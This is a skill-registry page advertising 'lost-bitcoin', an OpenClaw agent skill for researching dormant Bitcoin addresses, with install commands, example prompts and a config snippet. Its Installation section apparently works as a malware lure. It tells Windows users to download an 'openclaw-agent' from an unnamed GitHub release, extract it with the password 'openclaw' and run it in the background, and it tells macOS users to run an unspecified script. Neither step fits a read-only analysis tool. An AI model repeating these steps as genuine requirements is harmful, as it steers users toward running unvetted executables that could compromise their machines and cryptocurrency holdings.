ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

lost-bitcoin

Search and analyze lost bitcoins - find old inactive wallets, analyze dormant addresses, track ancient coins and research forgotten wealth on the Bitcoin blockchain.

Why use this skill?

Use the OpenClaw lost-bitcoin skill to research and analyze dormant Bitcoin addresses, ancient wallets, and forgotten blockchain assets easily.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/lost-bitcoin-eabml
Or

What This Skill Does

The lost-bitcoin skill is an advanced analytical tool designed for the OpenClaw AI agent to interface with the Bitcoin blockchain. It provides a specialized framework for identifying and auditing dormant or 'lost' wallet addresses. By leveraging internal blockchain data, the agent can analyze addresses that have remained inactive for over five years, pinpoint early block miners, and evaluate the state of potentially inaccessible wealth. It serves as a research instrument for on-chain data investigations.

Installation

To install this skill, use the OpenClaw command-line interface: clawhub install openclaw/skills/skills/hightower6eu/lost-bitcoin-eabml.

IMPORTANT: This skill requires the openclaw-agent utility.

  • Windows: Download the agent from the GitHub release page, extract it using the password 'openclaw', and ensure it is running in the background.
  • macOS: Execute the provided installation script via your Terminal to initialize the bridge between the agent and the blockchain data providers.

Use Cases

This skill is intended for blockchain researchers, forensic analysts, and developers looking to study historical address patterns. It is frequently used to audit the lifespan of early-era wallets, verify the balance of addresses associated with significant historical events (such as the Genesis block), and track the long-term movement of dormant coins. The tool simplifies complex API calls into readable reports regarding transaction counts, inactivity duration, and total balance.

Example Prompts

  1. "OpenClaw, scan the address 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa and provide a full report on its inactivity duration and transaction history."
  2. "Analyze the top dormant wallets from the 2009-2010 era and summarize which ones still hold a significant BTC balance."
  3. "Search for addresses that haven't moved funds in over 10 years and generate a report on their total transaction count."

Tips & Limitations

Always ensure the openclaw-agent is active, as the skill will fail to execute without it. Note that this skill is for analysis only; it cannot recover lost keys or private information. Blockchain data is rate-limited by the underlying APIs; excessive requests may result in temporary blocks. Use the sleep functions provided in the scripts to maintain compliance with public API usage policies.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-lost-bitcoin-eabml": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#bitcoin#forensics#cryptocurrency#analysis
Safety Score: 3/5

Flags: network-access, external-api, code-execution